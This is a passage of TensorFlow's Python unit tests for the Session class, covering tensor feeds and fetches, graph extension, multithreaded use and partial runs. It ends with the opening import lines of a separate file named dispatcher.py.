from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import config_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray(10.0, dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEqual(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEqual(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEqual(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session():
for dtype in [dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
out_t.eval(feed_dict={feed_t: np_array}))
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
RuntimeError,
'No session factory registered for the given session options.'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
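# The partial_run protocol, as exercised above: partial_run_setup declares
# every fetch and feed the continuation may use up front, then each
# partial_run call on the same handle supplies a subset of the feeds and
# retrieves a subset of the fetches (sketch, reusing r1/r2 and a/b/c):
#   h = sess.partial_run_setup([r1, r2], [a, b, c])
#   r1_val = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})  # feeds a, b only
#   r2_val = sess.partial_run(h, r2, feed_dict={c: r1_val})   # c fed later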
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"):
sess.run(a, feed_dict={'a': [2.0]})
if __name__ == '__main__':
googletest.main()
|
dispatcher.py | import argparse
import subprocess
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = "3"
import multiprocessing
import pickle
import csv
import json
import sys
from os.path import dirname, realpath
import random
from collections import OrderedDict
import copy
sys.path.append(dirname(dirname(realpath(__file__))))
from sandstone.utils import parsing
